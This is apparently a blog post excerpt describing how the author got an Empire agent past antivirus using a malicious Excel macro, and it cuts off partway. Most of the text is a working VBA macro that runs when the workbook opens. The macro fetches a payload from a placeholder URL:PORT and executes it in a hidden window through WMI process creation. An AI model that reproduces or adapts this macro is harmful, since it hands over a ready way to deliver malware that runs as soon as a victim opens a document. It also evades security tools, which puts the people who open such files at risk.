I always heard bypassing AVs was really easy, I wanted to see it for myself. The goal here was to get an execute an Empire agent through a malicious macro. AVs tend to dislike macros for good reasons so I figured it would give me a good overview of the difficulty. Surprisingly, I couldn’t find a working example anywhere. There is obviously a lot of AV evasion techniques literature online or even tools who claim to bypass AVs, but somehow I couldn’t make them work to execute an Empire agent from a macro. I won’t go too much into detail, I’ll just point out the main techniques I used and where I got them from. So here it is : Private Sub Workbook_Open() Dim myURL As String myURL = “http://URL:PORT/PAYLOAD” Dim WinHttpReq As Object Set WinHttpReq = CreateObject(“Microsoft.XMLHTTP”) WinHttpReq.Open “GET”, myURL, False WinHttpReq.send Dim payload payload = WinHttpReq.ResponseText If WinHttpReq.Status = 200 Then Const HIDDEN_WINDOW = 5 strComputer = “.” Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”) Set objStartup = objWMIService.Get(“Win32_ProcessStartup”) Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”) errReturn = objProcess.Create(payload, Null, objConfig, intProcessID) End If End Sub The previous code is pretty…